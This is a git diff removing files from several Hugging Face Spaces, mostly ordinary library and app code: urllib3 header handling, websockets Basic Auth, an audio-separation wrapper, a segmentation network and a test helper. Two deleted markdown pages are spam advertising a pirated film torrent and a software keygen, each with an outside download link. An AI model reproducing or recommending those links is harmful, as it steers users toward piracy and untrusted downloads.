- """ - - _headers: HTTPHeaderDict - - def __init__(self, headers: HTTPHeaderDict) -> None: - self._headers = headers - - def __len__(self) -> int: - return len(list(self._headers.iteritems())) - - def __iter__(self) -> typing.Iterator[tuple[str, str]]: - return self._headers.iteritems() - - def __contains__(self, item: object) -> bool: - if isinstance(item, tuple) and len(item) == 2: - passed_key, passed_val = item - if isinstance(passed_key, str) and isinstance(passed_val, str): - return self._headers._has_value_for_header(passed_key, passed_val) - return False - - -class HTTPHeaderDict(typing.MutableMapping[str, str]): - """ - :param headers: - An iterable of field-value pairs. Must not contain multiple field names - when compared case-insensitively. - - :param kwargs: - Additional field-value pairs to pass in to ``dict.update``. - - A ``dict`` like container for storing HTTP Headers. - - Field names are stored and compared case-insensitively in compliance with - RFC 7230. Iteration provides the first case-sensitive key seen for each - case-insensitive pair. - - Using ``__setitem__`` syntax overwrites fields that compare equal - case-insensitively in order to maintain ``dict``'s api. For fields that - compare equal, instead create a new ``HTTPHeaderDict`` and use ``.add`` - in a loop. - - If multiple fields that are equal case-insensitively are passed to the - constructor or ``.update``, the behavior is undefined and some will be - lost. - - >>> headers = HTTPHeaderDict() - >>> headers.add('Set-Cookie', 'foo=bar') - >>> headers.add('set-cookie', 'baz=quxx') - >>> headers['content-length'] = '7' - >>> headers['SET-cookie'] - 'foo=bar, baz=quxx' - >>> headers['Content-Length'] - '7' - """ - - _container: typing.MutableMapping[str, list[str]] - - def __init__(self, headers: ValidHTTPHeaderSource | None = None, **kwargs: str): - super().__init__() - self._container = {} # 'dict' is insert-ordered in Python 3.7+ - if headers is not None: - if isinstance(headers, HTTPHeaderDict): - self._copy_from(headers) - else: - self.extend(headers) - if kwargs: - self.extend(kwargs) - - def __setitem__(self, key: str, val: str) -> None: - # avoid a bytes/str comparison by decoding before httplib - if isinstance(key, bytes): - key = key.decode("latin-1") - self._container[key.lower()] = [key, val] - - def __getitem__(self, key: str) -> str: - val = self._container[key.lower()] - return ", ".join(val[1:]) - - def __delitem__(self, key: str) -> None: - del self._container[key.lower()] - - def __contains__(self, key: object) -> bool: - if isinstance(key, str): - return key.lower() in self._container - return False - - def setdefault(self, key: str, default: str = "") -> str: - return super().setdefault(key, default) - - def __eq__(self, other: object) -> bool: - maybe_constructable = ensure_can_construct_http_header_dict(other) - if maybe_constructable is None: - return False - else: - other_as_http_header_dict = type(self)(maybe_constructable) - - return {k.lower(): v for k, v in self.itermerged()} == { - k.lower(): v for k, v in other_as_http_header_dict.itermerged() - } - - def __ne__(self, other: object) -> bool: - return not self.__eq__(other) - - def __len__(self) -> int: - return len(self._container) - - def __iter__(self) -> typing.Iterator[str]: - # Only provide the originally cased names - for vals in self._container.values(): - yield vals[0] - - def discard(self, key: str) -> None: - try: - del self[key] - except KeyError: - pass - - def add(self, key: str, val: str, *, combine: bool = False) -> 
None: - """Adds a (name, value) pair, doesn't overwrite the value if it already - exists. - - If this is called with combine=True, instead of adding a new header value - as a distinct item during iteration, this will instead append the value to - any existing header value with a comma. If no existing header value exists - for the key, then the value will simply be added, ignoring the combine parameter. - - >>> headers = HTTPHeaderDict(foo='bar') - >>> headers.add('Foo', 'baz') - >>> headers['foo'] - 'bar, baz' - >>> list(headers.items()) - [('foo', 'bar'), ('foo', 'baz')] - >>> headers.add('foo', 'quz', combine=True) - >>> list(headers.items()) - [('foo', 'bar, baz, quz')] - """ - # avoid a bytes/str comparison by decoding before httplib - if isinstance(key, bytes): - key = key.decode("latin-1") - key_lower = key.lower() - new_vals = [key, val] - # Keep the common case aka no item present as fast as possible - vals = self._container.setdefault(key_lower, new_vals) - if new_vals is not vals: - # if there are values here, then there is at least the initial - # key/value pair - assert len(vals) >= 2 - if combine: - vals[-1] = vals[-1] + ", " + val - else: - vals.append(val) - - def extend(self, *args: ValidHTTPHeaderSource, **kwargs: str) -> None: - """Generic import function for any type of header-like object. - Adapted version of MutableMapping.update in order to insert items - with self.add instead of self.__setitem__ - """ - if len(args) > 1: - raise TypeError( - f"extend() takes at most 1 positional arguments ({len(args)} given)" - ) - other = args[0] if len(args) >= 1 else () - - if isinstance(other, HTTPHeaderDict): - for key, val in other.iteritems(): - self.add(key, val) - elif isinstance(other, typing.Mapping): - for key, val in other.items(): - self.add(key, val) - elif isinstance(other, typing.Iterable): - other = typing.cast(typing.Iterable[typing.Tuple[str, str]], other) - for key, value in other: - self.add(key, value) - elif hasattr(other, "keys") and hasattr(other, "__getitem__"): - # THIS IS NOT A TYPESAFE BRANCH - # In this branch, the object has a `keys` attr but is not a Mapping or any of - # the other types indicated in the method signature. We do some stuff with - # it as though it partially implements the Mapping interface, but we're not - # doing that stuff safely AT ALL. - for key in other.keys(): - self.add(key, other[key]) - - for key, value in kwargs.items(): - self.add(key, value) - - @typing.overload - def getlist(self, key: str) -> list[str]: - ... - - @typing.overload - def getlist(self, key: str, default: _DT) -> list[str] | _DT: - ... - - def getlist( - self, key: str, default: _Sentinel | _DT = _Sentinel.not_passed - ) -> list[str] | _DT: - """Returns a list of all the values for the named field. Returns an - empty list if the key doesn't exist.""" - try: - vals = self._container[key.lower()] - except KeyError: - if default is _Sentinel.not_passed: - # _DT is unbound; empty list is instance of List[str] - return [] - # _DT is bound; default is instance of _DT - return default - else: - # _DT may or may not be bound; vals[1:] is instance of List[str], which - # meets our external interface requirement of `Union[List[str], _DT]`. - return vals[1:] - - def _prepare_for_method_change(self) -> Self: - """ - Remove content-specific header fields before changing the request - method to GET or HEAD according to RFC 9110, Section 15.4. 
- """ - content_specific_headers = [ - "Content-Encoding", - "Content-Language", - "Content-Location", - "Content-Type", - "Content-Length", - "Digest", - "Last-Modified", - ] - for header in content_specific_headers: - self.discard(header) - return self - - # Backwards compatibility for httplib - getheaders = getlist - getallmatchingheaders = getlist - iget = getlist - - # Backwards compatibility for http.cookiejar - get_all = getlist - - def __repr__(self) -> str: - return f"{type(self).__name__}({dict(self.itermerged())})" - - def _copy_from(self, other: HTTPHeaderDict) -> None: - for key in other: - val = other.getlist(key) - self._container[key.lower()] = [key, *val] - - def copy(self) -> HTTPHeaderDict: - clone = type(self)() - clone._copy_from(self) - return clone - - def iteritems(self) -> typing.Iterator[tuple[str, str]]: - """Iterate over all header lines, including duplicate ones.""" - for key in self: - vals = self._container[key.lower()] - for val in vals[1:]: - yield vals[0], val - - def itermerged(self) -> typing.Iterator[tuple[str, str]]: - """Iterate over all headers, merging duplicate ones together.""" - for key in self: - val = self._container[key.lower()] - yield val[0], ", ".join(val[1:]) - - def items(self) -> HTTPHeaderDictItemView: # type: ignore[override] - return HTTPHeaderDictItemView(self) - - def _has_value_for_header(self, header_name: str, potential_value: str) -> bool: - if header_name in self: - return potential_value in self._container[header_name.lower()][1:] - return False - - def __ior__(self, other: object) -> HTTPHeaderDict: - # Supports extending a header dict in-place using operator |= - # combining items with add instead of __setitem__ - maybe_constructable = ensure_can_construct_http_header_dict(other) - if maybe_constructable is None: - return NotImplemented - self.extend(maybe_constructable) - return self - - def __or__(self, other: object) -> HTTPHeaderDict: - # Supports merging header dicts using operator | - # combining items with add instead of __setitem__ - maybe_constructable = ensure_can_construct_http_header_dict(other) - if maybe_constructable is None: - return NotImplemented - result = self.copy() - result.extend(maybe_constructable) - return result - - def __ror__(self, other: object) -> HTTPHeaderDict: - # Supports merging header dicts using operator | when other is on left side - # combining items with add instead of __setitem__ - maybe_constructable = ensure_can_construct_http_header_dict(other) - if maybe_constructable is None: - return NotImplemented - result = type(self)(maybe_constructable) - result.extend(self) - return result diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/websockets/legacy/auth.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/websockets/legacy/auth.py deleted file mode 100644 index d3425836e18b21b0daefc62793a90e97e1e1a6a8..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/websockets/legacy/auth.py +++ /dev/null @@ -1,184 +0,0 @@ -from __future__ import annotations - -import functools -import hmac -import http -from typing import Any, Awaitable, Callable, Iterable, Optional, Tuple, Union, cast - -from ..datastructures import Headers -from ..exceptions import InvalidHeader -from ..headers import build_www_authenticate_basic, parse_authorization_basic -from .server import HTTPResponse, WebSocketServerProtocol - - -__all__ = ["BasicAuthWebSocketServerProtocol", "basic_auth_protocol_factory"] - -Credentials 
= Tuple[str, str] - - -def is_credentials(value: Any) -> bool: - try: - username, password = value - except (TypeError, ValueError): - return False - else: - return isinstance(username, str) and isinstance(password, str) - - -class BasicAuthWebSocketServerProtocol(WebSocketServerProtocol): - """ - WebSocket server protocol that enforces HTTP Basic Auth. - - """ - - realm: str = "" - """ - Scope of protection. - - If provided, it should contain only ASCII characters because the - encoding of non-ASCII characters is undefined. - """ - - username: Optional[str] = None - """Username of the authenticated user.""" - - def __init__( - self, - *args: Any, - realm: Optional[str] = None, - check_credentials: Optional[Callable[[str, str], Awaitable[bool]]] = None, - **kwargs: Any, - ) -> None: - if realm is not None: - self.realm = realm # shadow class attribute - self._check_credentials = check_credentials - super().__init__(*args, **kwargs) - - async def check_credentials(self, username: str, password: str) -> bool: - """ - Check whether credentials are authorized. - - This coroutine may be overridden in a subclass, for example to - authenticate against a database or an external service. - - Args: - username: HTTP Basic Auth username. - password: HTTP Basic Auth password. - - Returns: - bool: :obj:`True` if the handshake should continue; - :obj:`False` if it should fail with an HTTP 401 error. - - """ - if self._check_credentials is not None: - return await self._check_credentials(username, password) - - return False - - async def process_request( - self, - path: str, - request_headers: Headers, - ) -> Optional[HTTPResponse]: - """ - Check HTTP Basic Auth and return an HTTP 401 response if needed. - - """ - try: - authorization = request_headers["Authorization"] - except KeyError: - return ( - http.HTTPStatus.UNAUTHORIZED, - [("WWW-Authenticate", build_www_authenticate_basic(self.realm))], - b"Missing credentials\n", - ) - - try: - username, password = parse_authorization_basic(authorization) - except InvalidHeader: - return ( - http.HTTPStatus.UNAUTHORIZED, - [("WWW-Authenticate", build_www_authenticate_basic(self.realm))], - b"Unsupported credentials\n", - ) - - if not await self.check_credentials(username, password): - return ( - http.HTTPStatus.UNAUTHORIZED, - [("WWW-Authenticate", build_www_authenticate_basic(self.realm))], - b"Invalid credentials\n", - ) - - self.username = username - - return await super().process_request(path, request_headers) - - -def basic_auth_protocol_factory( - realm: Optional[str] = None, - credentials: Optional[Union[Credentials, Iterable[Credentials]]] = None, - check_credentials: Optional[Callable[[str, str], Awaitable[bool]]] = None, - create_protocol: Optional[Callable[..., BasicAuthWebSocketServerProtocol]] = None, -) -> Callable[..., BasicAuthWebSocketServerProtocol]: - """ - Protocol factory that enforces HTTP Basic Auth. - - :func:`basic_auth_protocol_factory` is designed to integrate with - :func:`~websockets.server.serve` like this:: - - websockets.serve( - ..., - create_protocol=websockets.basic_auth_protocol_factory( - realm="my dev server", - credentials=("hello", "iloveyou"), - ) - ) - - Args: - realm: Scope of protection. It should contain only ASCII characters - because the encoding of non-ASCII characters is undefined. - Refer to section 2.2 of :rfc:`7235` for details. - credentials: Hard coded authorized credentials. It can be a - ``(username, password)`` pair or a list of such pairs. - check_credentials: Coroutine that verifies credentials. 
- It receives ``username`` and ``password`` arguments - and returns a :class:`bool`. One of ``credentials`` or - ``check_credentials`` must be provided but not both. - create_protocol: Factory that creates the protocol. By default, this - is :class:`BasicAuthWebSocketServerProtocol`. It can be replaced - by a subclass. - Raises: - TypeError: If the ``credentials`` or ``check_credentials`` argument is - wrong. - - """ - if (credentials is None) == (check_credentials is None): - raise TypeError("provide either credentials or check_credentials") - - if credentials is not None: - if is_credentials(credentials): - credentials_list = [cast(Credentials, credentials)] - elif isinstance(credentials, Iterable): - credentials_list = list(credentials) - if not all(is_credentials(item) for item in credentials_list): - raise TypeError(f"invalid credentials argument: {credentials}") - else: - raise TypeError(f"invalid credentials argument: {credentials}") - - credentials_dict = dict(credentials_list) - - async def check_credentials(username: str, password: str) -> bool: - try: - expected_password = credentials_dict[username] - except KeyError: - return False - return hmac.compare_digest(expected_password, password) - - if create_protocol is None: - create_protocol = BasicAuthWebSocketServerProtocol - - return functools.partial( - create_protocol, - realm=realm, - check_credentials=check_credentials, - ) diff --git a/spaces/pseudolab/SonGPT/README.md b/spaces/pseudolab/SonGPT/README.md deleted file mode 100644 index 9283ebb9d8a1cc8afe4d4da32303a90624dcea76..0000000000000000000000000000000000000000 --- a/spaces/pseudolab/SonGPT/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: SonGPT -emoji: ⚽🇰🇷 -colorFrom: pink -colorTo: blue -sdk: streamlit -sdk_version: 1.28.1 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/qingxu98/gpt-academic/tests/test_utils.py b/spaces/qingxu98/gpt-academic/tests/test_utils.py deleted file mode 100644 index 1fdca1eb1f699256c0ea7a7d0455352497d6f76c..0000000000000000000000000000000000000000 --- a/spaces/qingxu98/gpt-academic/tests/test_utils.py +++ /dev/null @@ -1,81 +0,0 @@ -from toolbox import get_conf -from toolbox import set_conf -from toolbox import set_multi_conf -from toolbox import get_plugin_handle -from toolbox import get_plugin_default_kwargs -from toolbox import get_chat_handle -from toolbox import get_chat_default_kwargs -from functools import wraps -import sys -import os - -def chat_to_markdown_str(chat): - result = "" - for i, cc in enumerate(chat): - result += f'\n\n{cc[0]}\n\n{cc[1]}' - if i != len(chat)-1: - result += '\n\n---' - return result - -def silence_stdout(func): - @wraps(func) - def wrapper(*args, **kwargs): - _original_stdout = sys.stdout - sys.stdout = open(os.devnull, 'w') - sys.stdout.reconfigure(encoding='utf-8') - for q in func(*args, **kwargs): - sys.stdout = _original_stdout - yield q - sys.stdout = open(os.devnull, 'w') - sys.stdout.reconfigure(encoding='utf-8') - sys.stdout.close() - sys.stdout = _original_stdout - return wrapper - -def silence_stdout_fn(func): - @wraps(func) - def wrapper(*args, **kwargs): - _original_stdout = sys.stdout - sys.stdout = open(os.devnull, 'w') - sys.stdout.reconfigure(encoding='utf-8') - result = func(*args, **kwargs) - sys.stdout.close() - sys.stdout = _original_stdout - return result - return wrapper - -class VoidTerminal(): - def __init__(self) -> None: - pass - -vt = VoidTerminal() 
-vt.get_conf = silence_stdout_fn(get_conf) -vt.set_conf = silence_stdout_fn(set_conf) -vt.set_multi_conf = silence_stdout_fn(set_multi_conf) -vt.get_plugin_handle = silence_stdout_fn(get_plugin_handle) -vt.get_plugin_default_kwargs = silence_stdout_fn(get_plugin_default_kwargs) -vt.get_chat_handle = silence_stdout_fn(get_chat_handle) -vt.get_chat_default_kwargs = silence_stdout_fn(get_chat_default_kwargs) -vt.chat_to_markdown_str = chat_to_markdown_str -proxies, WEB_PORT, LLM_MODEL, CONCURRENT_COUNT, AUTHENTICATION, CHATBOT_HEIGHT, LAYOUT, API_KEY = \ - vt.get_conf('proxies', 'WEB_PORT', 'LLM_MODEL', 'CONCURRENT_COUNT', 'AUTHENTICATION', 'CHATBOT_HEIGHT', 'LAYOUT', 'API_KEY') - -def plugin_test(main_input, plugin, advanced_arg=None): - from rich.live import Live - from rich.markdown import Markdown - - vt.set_conf(key="API_KEY", value=API_KEY) - vt.set_conf(key="LLM_MODEL", value=LLM_MODEL) - - plugin = vt.get_plugin_handle(plugin) - plugin_kwargs = vt.get_plugin_default_kwargs() - plugin_kwargs['main_input'] = main_input - if advanced_arg is not None: - plugin_kwargs['plugin_kwargs'] = advanced_arg - my_working_plugin = silence_stdout(plugin)(**plugin_kwargs) - - with Live(Markdown(""), auto_refresh=False, vertical_overflow="visible") as live: - for cookies, chat, hist, msg in my_working_plugin: - md_str = vt.chat_to_markdown_str(chat) - md = Markdown(md_str) - live.update(md, refresh=True) \ No newline at end of file diff --git a/spaces/quidiaMuxgu/Expedit-SAM/Download Dear Zindagi Full Movie With English Subtitles In Torrent.md b/spaces/quidiaMuxgu/Expedit-SAM/Download Dear Zindagi Full Movie With English Subtitles In Torrent.md deleted file mode 100644 index c3abe83426587aeab9a852522392da87f0b0df27..0000000000000000000000000000000000000000 --- a/spaces/quidiaMuxgu/Expedit-SAM/Download Dear Zindagi Full Movie With English Subtitles In Torrent.md +++ /dev/null @@ -1,6 +0,0 @@ -

      Download Dear Zindagi Full Movie With English Subtitles In Torrent


Download File https://geags.com/2uCswM



      -
      - 4d29de3e1b
      -
      -
      -

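The tests/test_utils.py module removed above (spaces/qingxu98/gpt-academic) silences console noise by swapping sys.stdout for os.devnull around plugin calls, with one wrapper for plain functions and another that restores stdout around each yield of a generator. The sketch below is not that project's code; it is a minimal standalone illustration of the plain-function case, assuming only the standard library, with illustrative names.

```python
import contextlib
import os
from functools import wraps


def silence_stdout_fn(func):
    """Run func with anything it prints discarded (illustrative sketch)."""
    @wraps(func)
    def wrapper(*args, **kwargs):
        # Redirect stdout to the null device only for the duration of the call.
        with open(os.devnull, "w", encoding="utf-8") as devnull:
            with contextlib.redirect_stdout(devnull):
                return func(*args, **kwargs)
    return wrapper


@silence_stdout_fn
def noisy_add(a, b):
    print("debug chatter that should not reach the console")
    return a + b


print(noisy_add(2, 3))  # prints 5; the debug line is swallowed
```

For the generator variant, the deleted module re-opens the null device before each resume and restores the real stdout before each yield, so that whoever consumes the generator can still print normally between items.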
      diff --git a/spaces/quidiaMuxgu/Expedit-SAM/EOBDFacile.Keygen.2015.v5.rar Keygen [2021].md b/spaces/quidiaMuxgu/Expedit-SAM/EOBDFacile.Keygen.2015.v5.rar Keygen [2021].md deleted file mode 100644 index 997136761e5614504d5d2344e8407aecd485853e..0000000000000000000000000000000000000000 --- a/spaces/quidiaMuxgu/Expedit-SAM/EOBDFacile.Keygen.2015.v5.rar Keygen [2021].md +++ /dev/null @@ -1,6 +0,0 @@ -

      EOBDFacile.Keygen.2015.v5.rar keygen


      DOWNLOAD ••• https://geags.com/2uCqEE



- 
- d5da3c52bf
      -
      -
      -

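Earlier in this diff, urllib3's _collections.py is removed; its RecentlyUsedContainer is a thread-safe LRU mapping that, once it holds more than maxsize keys, evicts the least recently used entry and passes the evicted value to dispose_func. The sketch below is only a usage illustration against that class; it assumes urllib3 is installed and that the private urllib3._collections module still exposes RecentlyUsedContainer, and the connection objects are stand-ins.

```python
from urllib3._collections import RecentlyUsedContainer


class FakeConnection:
    """Stand-in for a pooled resource that must be cleaned up on eviction."""

    def __init__(self, host):
        self.host = host

    def close(self):
        print(f"closing connection to {self.host}")


# Keep at most two connections; close whichever one falls off the LRU end.
pool = RecentlyUsedContainer(maxsize=2, dispose_func=lambda conn: conn.close())

pool["a"] = FakeConnection("a.example")
pool["b"] = FakeConnection("b.example")
_ = pool["a"]                             # touch "a" so "b" is now least recently used
pool["c"] = FakeConnection("c.example")   # evicts "b" and triggers its close()

print(sorted(pool.keys()))                # ['a', 'c']
```

The dispose_func hook is what lets the container double as a small connection pool: eviction and cleanup happen in one place instead of being scattered across call sites.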
      diff --git a/spaces/r3gm/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/mdx.py b/spaces/r3gm/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/mdx.py deleted file mode 100644 index 4cc7c08b37bc371294f2f82b3382424a5455b7c2..0000000000000000000000000000000000000000 --- a/spaces/r3gm/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/mdx.py +++ /dev/null @@ -1,228 +0,0 @@ -import torch -import onnxruntime as ort -from tqdm import tqdm -import warnings -import numpy as np -import hashlib -import queue -import threading - -warnings.filterwarnings("ignore") - -class MDX_Model: - def __init__(self, device, dim_f, dim_t, n_fft, hop=1024, stem_name=None, compensation=1.000): - self.dim_f = dim_f - self.dim_t = dim_t - self.dim_c = 4 - self.n_fft = n_fft - self.hop = hop - self.stem_name = stem_name - self.compensation = compensation - - self.n_bins = self.n_fft//2+1 - self.chunk_size = hop * (self.dim_t-1) - self.window = torch.hann_window(window_length=self.n_fft, periodic=True).to(device) - - out_c = self.dim_c - - self.freq_pad = torch.zeros([1, out_c, self.n_bins-self.dim_f, self.dim_t]).to(device) - - def stft(self, x): - x = x.reshape([-1, self.chunk_size]) - x = torch.stft(x, n_fft=self.n_fft, hop_length=self.hop, window=self.window, center=True, return_complex=True) - x = torch.view_as_real(x) - x = x.permute([0,3,1,2]) - x = x.reshape([-1,2,2,self.n_bins,self.dim_t]).reshape([-1,4,self.n_bins,self.dim_t]) - return x[:,:,:self.dim_f] - - def istft(self, x, freq_pad=None): - freq_pad = self.freq_pad.repeat([x.shape[0],1,1,1]) if freq_pad is None else freq_pad - x = torch.cat([x, freq_pad], -2) - # c = 4*2 if self.target_name=='*' else 2 - x = x.reshape([-1,2,2,self.n_bins,self.dim_t]).reshape([-1,2,self.n_bins,self.dim_t]) - x = x.permute([0,2,3,1]) - x = x.contiguous() - x = torch.view_as_complex(x) - x = torch.istft(x, n_fft=self.n_fft, hop_length=self.hop, window=self.window, center=True) - return x.reshape([-1,2,self.chunk_size]) - - -class MDX: - - DEFAULT_SR = 44100 - # Unit: seconds - DEFAULT_CHUNK_SIZE = 0 * DEFAULT_SR - DEFAULT_MARGIN_SIZE = 1 * DEFAULT_SR - - DEFAULT_PROCESSOR = 0 - - def __init__(self, model_path:str, params:MDX_Model, processor=DEFAULT_PROCESSOR): - - # Set the device and the provider (CPU or CUDA) - self.device = torch.device(f'cuda:{processor}') if processor >= 0 else torch.device('cpu') - self.provider = ['CUDAExecutionProvider'] if processor >= 0 else ['CPUExecutionProvider'] - - self.model = params - - # Load the ONNX model using ONNX Runtime - self.ort = ort.InferenceSession(model_path, providers=self.provider) - # Preload the model for faster performance - self.ort.run(None, {'input':torch.rand(1, 4, params.dim_f, params.dim_t).numpy()}) - self.process = lambda spec:self.ort.run(None, {'input': spec.cpu().numpy()})[0] - - self.prog = None - - @staticmethod - def get_hash(model_path): - try: - with open(model_path, 'rb') as f: - f.seek(- 10000 * 1024, 2) - model_hash = hashlib.md5(f.read()).hexdigest() - except: - model_hash = hashlib.md5(open(model_path,'rb').read()).hexdigest() - - return model_hash - - @staticmethod - def segment(wave, combine=True, chunk_size=DEFAULT_CHUNK_SIZE, margin_size=DEFAULT_MARGIN_SIZE): - """ - Segment or join segmented wave array - - Args: - wave: (np.array) Wave array to be segmented or joined - combine: (bool) If True, combines segmented wave array. If False, segments wave array. 
- chunk_size: (int) Size of each segment (in samples) - margin_size: (int) Size of margin between segments (in samples) - - Returns: - numpy array: Segmented or joined wave array - """ - - if combine: - processed_wave = None # Initializing as None instead of [] for later numpy array concatenation - for segment_count, segment in enumerate(wave): - start = 0 if segment_count == 0 else margin_size - end = None if segment_count == len(wave)-1 else -margin_size - if margin_size == 0: - end = None - if processed_wave is None: # Create array for first segment - processed_wave = segment[:, start:end] - else: # Concatenate to existing array for subsequent segments - processed_wave = np.concatenate((processed_wave, segment[:, start:end]), axis=-1) - - else: - processed_wave = [] - sample_count = wave.shape[-1] - - if chunk_size <= 0 or chunk_size > sample_count: - chunk_size = sample_count - - if margin_size > chunk_size: - margin_size = chunk_size - - for segment_count, skip in enumerate(range(0, sample_count, chunk_size)): - - margin = 0 if segment_count == 0 else margin_size - end = min(skip+chunk_size+margin_size, sample_count) - start = skip-margin - - cut = wave[:,start:end].copy() - processed_wave.append(cut) - - if end == sample_count: - break - - return processed_wave - - def pad_wave(self, wave): - """ - Pad the wave array to match the required chunk size - - Args: - wave: (np.array) Wave array to be padded - - Returns: - tuple: (padded_wave, pad, trim) - - padded_wave: Padded wave array - - pad: Number of samples that were padded - - trim: Number of samples that were trimmed - """ - n_sample = wave.shape[1] - trim = self.model.n_fft//2 - gen_size = self.model.chunk_size-2*trim - pad = gen_size - n_sample%gen_size - - # Padded wave - wave_p = np.concatenate((np.zeros((2,trim)), wave, np.zeros((2,pad)), np.zeros((2,trim))), 1) - - mix_waves = [] - for i in range(0, n_sample+pad, gen_size): - waves = np.array(wave_p[:, i:i+self.model.chunk_size]) - mix_waves.append(waves) - - mix_waves = torch.tensor(mix_waves, dtype=torch.float32).to(self.device) - - return mix_waves, pad, trim - - def _process_wave(self, mix_waves, trim, pad, q:queue.Queue, _id:int): - """ - Process each wave segment in a multi-threaded environment - - Args: - mix_waves: (torch.Tensor) Wave segments to be processed - trim: (int) Number of samples trimmed during padding - pad: (int) Number of samples padded during padding - q: (queue.Queue) Queue to hold the processed wave segments - _id: (int) Identifier of the processed wave segment - - Returns: - numpy array: Processed wave segment - """ - mix_waves = mix_waves.split(1) - with torch.no_grad(): - pw = [] - for mix_wave in mix_waves: - self.prog.update() - spec = self.model.stft(mix_wave) - processed_spec = torch.tensor(self.process(spec)) - processed_wav = self.model.istft(processed_spec.to(self.device)) - processed_wav = processed_wav[:,:,trim:-trim].transpose(0,1).reshape(2, -1).cpu().numpy() - pw.append(processed_wav) - processed_signal = np.concatenate(pw, axis=-1)[:, :-pad] - q.put({_id:processed_signal}) - return processed_signal - - def process_wave(self, wave:np.array, mt_threads=1): - """ - Process the wave array in a multi-threaded environment - - Args: - wave: (np.array) Wave array to be processed - mt_threads: (int) Number of threads to be used for processing - - Returns: - numpy array: Processed wave array - """ - self.prog = tqdm(total=0) - chunk = wave.shape[-1]//mt_threads - waves = self.segment(wave, False, chunk) - - # Create a queue to hold the 
processed wave segments - q = queue.Queue() - threads = [] - for c, batch in enumerate(waves): - mix_waves, pad, trim = self.pad_wave(batch) - self.prog.total = len(mix_waves)*mt_threads - thread = threading.Thread(target=self._process_wave, args=(mix_waves, trim, pad, q, c)) - thread.start() - threads.append(thread) - for thread in threads: - thread.join() - self.prog.close() - - processed_batches = [] - while not q.empty(): - processed_batches.append(q.get()) - processed_batches = [list(wave.values())[0] for wave in sorted(processed_batches, key=lambda d: list(d.keys())[0])] - assert len(processed_batches) == len(waves), 'Incomplete processed batches, please reduce batch size!' - return self.segment(processed_batches, True, chunk) \ No newline at end of file diff --git a/spaces/radames/Detecting-Photoshopped-Faces-FALdetector/networks/drn_seg.py b/spaces/radames/Detecting-Photoshopped-Faces-FALdetector/networks/drn_seg.py deleted file mode 100644 index 084a39bc0ee42a533d6151508ec93fc3680753fd..0000000000000000000000000000000000000000 --- a/spaces/radames/Detecting-Photoshopped-Faces-FALdetector/networks/drn_seg.py +++ /dev/null @@ -1,95 +0,0 @@ -import math -import torch -import torch.nn as nn -from networks.drn import drn_c_26 - - -def fill_up_weights(up): - w = up.weight.data - f = math.ceil(w.size(2) / 2) - c = (2 * f - 1 - f % 2) / (2. * f) - for i in range(w.size(2)): - for j in range(w.size(3)): - w[0, 0, i, j] = \ - (1 - math.fabs(i / f - c)) * (1 - math.fabs(j / f - c)) - for c in range(1, w.size(0)): - w[c, 0, :, :] = w[0, 0, :, :] - - -class DRNSeg(nn.Module): - def __init__(self, classes, pretrained_drn=False, - pretrained_model=None, use_torch_up=False): - super(DRNSeg, self).__init__() - - model = drn_c_26(pretrained=pretrained_drn) - self.base = nn.Sequential(*list(model.children())[:-2]) - if pretrained_model: - self.load_pretrained(pretrained_model) - - self.seg = nn.Conv2d(model.out_dim, classes, - kernel_size=1, bias=True) - - m = self.seg - n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels - m.weight.data.normal_(0, math.sqrt(2. 
/ n)) - m.bias.data.zero_() - if use_torch_up: - self.up = nn.UpsamplingBilinear2d(scale_factor=8) - else: - up = nn.ConvTranspose2d(classes, classes, 16, stride=8, padding=4, - output_padding=0, groups=classes, - bias=False) - fill_up_weights(up) - up.weight.requires_grad = False - self.up = up - - def forward(self, x): - x = self.base(x) - x = self.seg(x) - y = self.up(x) - return y - - def optim_parameters(self, memo=None): - for param in self.base.parameters(): - yield param - for param in self.seg.parameters(): - yield param - - def load_pretrained(self, pretrained_model): - print("loading the pretrained drn model from %s" % pretrained_model) - state_dict = torch.load(pretrained_model, map_location='cpu') - if hasattr(state_dict, '_metadata'): - del state_dict._metadata - - # filter out unnecessary keys - pretrained_dict = state_dict['model'] - pretrained_dict = {k[5:]: v for k, v in pretrained_dict.items() if k.split('.')[0] == 'base'} - - # load the pretrained state dict - self.base.load_state_dict(pretrained_dict) - - -class DRNSub(nn.Module): - def __init__(self, num_classes, pretrained_model=None, fix_base=False): - super(DRNSub, self).__init__() - - drnseg = DRNSeg(2) - if pretrained_model: - print("loading the pretrained drn model from %s" % pretrained_model) - state_dict = torch.load(pretrained_model, map_location='cpu') - drnseg.load_state_dict(state_dict['model']) - - self.base = drnseg.base - if fix_base: - for param in self.base.parameters(): - param.requires_grad = False - - self.avgpool = nn.AdaptiveAvgPool2d((1, 1)) - self.fc = nn.Linear(512, num_classes) - - def forward(self, x): - x = self.base(x) - x = self.avgpool(x) - x = x.view(x.size(0), -1) - x = self.fc(x) - return x diff --git a/spaces/radames/transformers-js-sveltekit-server-example-app/src/routes/classify/+server.js b/spaces/radames/transformers-js-sveltekit-server-example-app/src/routes/classify/+server.js deleted file mode 100644 index 187dccf3ab1931b3a173153a820615818e969d5f..0000000000000000000000000000000000000000 --- a/spaces/radames/transformers-js-sveltekit-server-example-app/src/routes/classify/+server.js +++ /dev/null @@ -1,22 +0,0 @@ -import { json } from '@sveltejs/kit'; -import PipelineSingleton from '$lib/server/pipeline.js'; - -export async function GET({ url }) { - const text = url.searchParams.get('text'); - if (!text) { - return json( - { - error: 'Missing text parameter' - }, - { status: 400 } - ); - } - // Get the classification pipeline. When called for the first time, - // this will load the pipeline and cache it for future use. - const classifier = await PipelineSingleton.getInstance(); - - // Actually perform the classification - const result = await classifier(text); - - return json(result); -} diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Alexandra Ledermann 8 Secret Des ((BETTER)).md b/spaces/raedeXanto/academic-chatgpt-beta/Alexandra Ledermann 8 Secret Des ((BETTER)).md deleted file mode 100644 index 73d20126903c756e7206fb79f8f1586c8a05afec..0000000000000000000000000000000000000000 --- 